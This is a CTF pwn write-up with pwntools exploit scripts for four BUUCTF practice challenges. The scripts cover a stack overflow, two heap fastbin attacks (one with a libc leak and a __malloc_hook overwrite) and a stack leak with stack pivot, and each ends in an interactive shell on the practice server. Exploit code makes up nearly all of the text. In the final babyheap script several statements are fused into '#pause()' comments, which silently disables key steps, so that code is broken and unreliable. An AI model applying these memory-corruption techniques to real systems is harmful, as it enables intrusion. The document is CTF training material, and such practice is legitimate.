PWN-PRACTICE-BUUCTF-16
- mrctf2020_easyoverflow
- hitcontraining_magicheap
- ciscn_2019_s_4
- 0ctf_2017_babyheap
mrctf2020_easyoverflow
覆盖main函数中的v5,使之为"n0t_r3@11y_f1@g"
from pwn import *
# Practice instance: the BUUCTF node and port given in this write-up.
r=remote("node4.buuoj.cn",29521)
# Per the note above: 0x30 bytes of filler, then the string that has to land in
# main's local v5. The 0x30 distance is the author's value — verify it against the
# binary's stack layout rather than trusting the write-up.
payload='a'*0x30+"n0t_r3@11y_f1@g"
r.sendline(payload)
r.interactive()
hitcontraining_magicheap
参考:picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
from pwn import *
# Practice instance from the write-up; the local process() line is the author's
# offline alternative and is left commented out.
io=remote("node4.buuoj.cn",27011)
#io=process("./magicheap")
elf=ELF("./magicheap")


def create(size,content):
    """Answer the target's menu for choice 1: new heap entry of `size` bytes holding `content`.

    One sendlineafter() per prompt, in the order the binary asks; the prompt
    strings are copied from the binary's output and must match exactly.
    """
    io.sendlineafter("choice :","1")
    io.sendlineafter("Size of Heap : ",str(size))
    io.sendlineafter("Content of heap:",content)
def edit(index,size,content):
    """Answer the target's menu for choice 2: rewrite entry `index` with `size` bytes of `content`.

    The prompts are answered in the order the binary asks them; each prompt
    string must match the binary's output byte-for-byte.
    """
    dialogue = (
        ("choice :", "2"),
        ("Index :", str(index)),
        ("Size of Heap : ", str(size)),
        ("Content of heap : ", content),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
def delete(index):
    """Answer the target's menu for choice 3: release heap entry `index`."""
    for prompt, answer in (("choice :", "3"), ("Index :", str(index))):
        io.sendlineafter(prompt, answer)
def getshell():
    """Select menu choice 4869 — the extra option the write-up triggers once the heap is prepared."""
    io.sendlineafter("choice :","4869")


# Address of the binary's heap-pointer array (author's value; confirm in the disassembly).
heaparray=0x00000000006020C0
# Fake-chunk location expressed relative to heaparray; the -0x38+5 offset is the
# author's choice and is specific to this binary's data layout.
fake_chunk_prev_size=heaparray-0x38+5
#gdb.attach(io)
#pause()
create(0x10,"a"*8)#chunk0
create(0x10,"b"*8)#chunk1
create(0x60,"c"*8)#chunk2
#pause()
delete(2)
#pause()
# The payload is 0x28 bytes but chunk1 was created with size 0x10: the edit
# routine takes the caller-supplied length, so this write runs into chunk2's
# header. That unchecked length is the defect the whole write-up relies on.
payload="b"*0x10+p64(0)+p64(0x71)+p64(fake_chunk_prev_size)
edit(1,len(payload),payload)
#pause()
create(0x60,"c"*8)#chunk2
create(0x60,"d"*8)#fake_chunk
#pause()
# 0x1305+1 is the value the write-up expects the 4869 option to check for —
# verify against the binary rather than taking it from here.
payload="d"*3+p64(0x1305+1)
edit(2,len(payload),payload)
getshell()
io.interactive()
ciscn_2019_s_4
泄露栈地址,然后栈迁移
from pwn import *
context.log_level="debug"
# Local process() line is the author's offline alternative, left commented out.
#io=process('./ciscn_s_4')
io=remote('node4.buuoj.cn',28112)
elf=ELF('./ciscn_s_4')
# Distance from the leaked stack value back to the start of the input buffer
# (author's value — confirm with a debugger on the actual binary).
input_stk_offset=0x50
# Fixed addresses from the write-up; p32/u32 and 0x0804... values mean a 32-bit
# binary, and using them as constants presumes no PIE — verify before reuse.
leave_ret=0x080484b8
system=0x08048559
#gdb.attach(io,"break * 0x080485CD")
io.recvuntil('your name?\n')
# Step 1 (the note above: leak a stack address). The buffer is filled up to a
# 'bbbb' marker; the bytes the program echoes after that marker are read as a
# stack pointer. Presumably the echo is unterminated — confirm in the binary.
payload='a'*(40-4)+'b'*4
io.send(payload)
io.recvuntil('bbbb')
io.recv(12)
stk=u32(io.recv(4))
input_stk=stk-input_stk_offset
io.recvuntil('\n')
# Step 2 (the note above: pivot the stack). The second write is padded to 0x28
# bytes and then sets the saved frame pointer and return address; the layout of
# system / argument pointer / "/bin/sh" is the author's and is tied to input_stk.
payload='a'*4+p32(system)+p32(input_stk+12)+'/bin/sh\x00'
payload=payload.ljust(0x28,'\x00')
payload+=p32(input_stk)
payload+=p32(leave_ret)
io.send(payload)
io.interactive()
0ctf_2017_babyheap
参考:0ctf_2017_babyheap
from pwn import *
context.log_level="debug"
# Practice instance from the write-up; the local process() line is the author's
# offline alternative and is left commented out.
io=remote("node4.buuoj.cn",28235)
#io=process("./0ctf_2017_babyheap")
elf=ELF("./0ctf_2017_babyheap")
# The libc build the author pairs with the remote target; the fixed offsets
# used later in the script are only valid for this exact file.
libc=ELF("./libc-2.23-16-x64.so")
def alloc(size):
    """Answer the target's menu for command 1: request an allocation of `size` bytes."""
    for prompt, answer in (("Command: ", "1"), ("Size: ", str(size))):
        io.sendlineafter(prompt, answer)
def fill(index,size,content):
    """Answer the target's menu for command 2: write `size` bytes of `content` into entry `index`.

    Prompts are answered in the order the binary asks them; the prompt strings
    must match the binary's output exactly.
    """
    dialogue = (
        ("Command: ", "2"),
        ("Index: ", str(index)),
        ("Size: ", str(size)),
        ("Content: ", content),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
def free(index):
    """Answer the target's menu for command 3: release entry `index`."""
    for prompt, answer in (("Command: ", "3"), ("Index: ", str(index))):
        io.sendlineafter(prompt, answer)
def dump(index):
    """Answer the target's menu for command 4: have the binary print entry `index`."""
    for prompt, answer in (("Command: ", "4"), ("Index: ", str(index))):
        io.sendlineafter(prompt, answer)


#gdb.attach(io)
#pause()alloc(0x10)#0
alloc(0x10)#1
alloc(0x80)#2
alloc(0x20)#3
alloc(0x60)#4
alloc(0x10)#5#pause()payload="a"*0x18+p64(0xb1)
fill(0,len(payload),payload)
free(1)
alloc(0xa0)#1 calloc
payload="b"*0x10+p64(0)+p64(0x91)
fill(1,len(payload),payload)
free(2)
dump(1)
libc_base = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00')) -0x3c4b78
print(hex(libc_base))
malloc_hook=libc_base+libc.sym["__malloc_hook"]
print(hex(malloc_hook))#pause()free(4)
payload="c"*0x20+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
fill(3,len(payload),payload)
alloc(0x60)#2
alloc(0x60)#4 fake chunk
one_gadget=libc_base+0x4526a
payload="\x00"*0x13+p64(one_gadget)
fill(4,len(payload),payload)#pause()alloc(1)io.interactive()